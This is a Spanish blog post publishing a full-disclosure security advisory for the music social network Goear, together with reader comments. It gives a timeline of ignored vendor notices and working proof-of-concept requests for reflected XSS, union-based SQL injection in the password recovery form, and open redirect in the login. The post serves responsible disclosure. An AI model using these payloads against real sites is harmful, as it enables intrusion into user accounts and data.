Blog

Publicar un aviso de seguridad y que no te hagan ni caso, NO TIENE PRECIO!

# Exploit Title :Goear music (social network) SQLinjection Union-Based/ Open Redirect/Cross Site Scripting

Os expongo como ha sido el time-line de la vulnerabilidad:

10-01-2013 Se avisa al “vendor” y a la SGAE
15-01-2013 Vendor no responde
1-02-2013 Se vuelve a avisar al vendor y a la SGAE
10-2-2013 vENDOR Y SGAE no responden
27-02-2013 Primer Disclosure
1-05-2013 Se fixea parcialmente
9-05-2013 Se comunica que NO está fixeado lo indicado
15-05-2013 No hay respuesta de la SGAE ni el vendor
28-05-2013 FULL DISCLOSURE

 

1

 

# Exploit Title :Goear music (social network) SQLinjection Union-Based/ Open Redirect/Cross Site Scripting

# *Vendor*: http://www.goear.com/

# Author: Juan Carlos García 

# Blog: http://hackingmadrid.blogspot.com

http://blog.0verl0ad.es

http://highsec.es/blog/

# Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196

2

BREVE DESCRIPCION

Goearmusic es una red social de origen español, para escuchar musica online o intercambiarla entre otras cosas. Posee la posibilidad de buscar por artista, por genero, puedes registrarte y puedes poner tu propia lista de musica. Como Youtube enlaza el archivo para que puedas compartirlo.

Importante: Tiene el soporte de la SGAE (Sociedad General de Autores y Editores) algo que lo hace si cabe más interesante …

Cross Site Scripting (Reflected-Persistent)

PoC:

-http://www.goear.com/showtree/tree.php?artist=%3Cscript%3Ealert%28%22Juan%20Carlos%20Garc%C3%ADa%20XSS%22%29%3C%2Fscript%3E

Attack: <script>alert(“Juan Carlos XSS”)</script>

-POST http://www.goear.com/lyric_search.php HTTP/1.1 (Reflected)

Attack: “><script>alert(1);</script>

Parameter:enter_mn_search

enter_mn_search=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&btn_lyric_search=Buscar

3

 

BLind SQLinjection (Union-Based)

PoC:

POST http://www.goear.com/account_recovery_step.php

Exploit: email=JUAN%27+UNION+ALL+select+NULL+–+&btn_restore=Reset


Open Redirect

PoC:

POST http://www.goear.com/loged.php HTTP/1.1

back=http%3A%2F%2Fhackingmadrid.blogspot.com&user_name=JUANCARLOS&password=JUANCARLOS&remember=remember&btn_login=Acceder
back=http%3A%2F%2Fwww.owasp.org&user_name=ZAP&password=ZAP&remember=remember&btn_login=Acceder

 

SPECIAL THANKS: Eduardo (@_Hykeos) y Roberto (@leurian) !!!

 

Espero que os haya gustado.

juancarlosec@highsec.es

 

  1. BTshell
    BTshell05-29-2013

    Fantastico el artículo, muy bueno Juan Carlos 🙂

  2. Jorge Websec
    Jorge Websec05-29-2013

    Muy buen post. Planteas un dilema que creo que en la seguridad informática siempre habrá.
    ¿Reportar o no reportar?

  3. Dylan
    Dylan05-30-2013

    Super! tu post. aunque ya esta vulnerabilidad la habia encontrado ya hace un tiempo. la base de datos es de 1 millon de usuarios , 🙂 todo el aplicativo web esta inseguro.

    • Juan Carlos García
      Juan Carlos García05-31-2013

      La encontraste? y que hiciste con ella? la reportaste? Tienes el Time-Line del Disclosure? o te la guardaste para ti? 😉

  4. Juan Carlos García
    Juan Carlos García05-31-2013

    MUCHAS GRACIAS por cierto por leerme Dylan !!!.

  5. Visitante
    Visitante09-05-2013

    Excelente, este dia llegue a tus post y wow creo que te seguire por siempre. Gracias por tu conocimiento, yo encontre una vulnerabilidad de una pagina pero nose si avisar o no. No lo hice con malas intenciones pero pueda que ellos no lo vean asi. Gracias

Leave a Reply

*

    No Twitter Messages